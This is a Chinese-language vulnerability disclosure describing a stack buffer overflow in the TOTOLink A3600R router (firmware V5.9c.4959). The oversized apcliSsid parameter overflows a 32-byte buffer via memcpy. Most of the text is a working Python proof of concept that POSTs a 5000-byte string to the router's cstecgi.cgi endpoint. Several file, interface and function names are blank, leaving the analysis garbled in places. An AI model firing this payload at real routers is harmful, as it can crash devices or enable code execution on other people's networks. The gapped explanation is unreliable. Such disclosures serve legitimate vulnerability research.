关键信息 目标设备 设备: TOTOLink A3600R路由器 固件版本: V5.9c.4959 漏洞类型 Buffer Overflow (缓冲区溢出) 漏洞详情 存在于 文件的 接口中 问题源于 参数长度未经过严格验证,导致memcpy函数使用时发生堆栈溢出 漏洞分析 在 函数中: 函数通过 获取 参数值,并将其复制到固定大小为32字节的栈缓冲区 中,未进行边界检查。 当输入的 长度超过32字节时,将导致栈缓冲区溢出,可能覆盖相邻的栈内存,引发内存损坏、进程崩溃或任意代码执行。 POC (Proof of Concept) 用于验证漏洞的Python代码示例: ```python import requests import json url = "http://192.168.0.1/cgi-bin/cstecgi.cgi" headers = { "Host": "192.168.0.1", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0", "Accept": "/", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": "http://192.168.0.1", "Referer": "http://192.168.0.1/internet/ipv6_wan.asp?timestamp=1768535405207", "Accept-Encoding": "gzip, deflate, br", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6", "Cookie": "SESSION_ID=2:1768535901:2", "Connection": "keep-alive", } repeat = "A" * 5000 data = { "topicurl": "setting/setAppEasyWizardConfig", "functionType": "2", "rootFlag": "2", "wifiIdx": "1", "apcliSsid": repeat, } payload = json.dumps(data) response = requests.post(url, headers=headers, data=data, timeout=10) print(response.status_code) for k, v in response.headers.items(): print(f"{k}: {v}") print(response.text)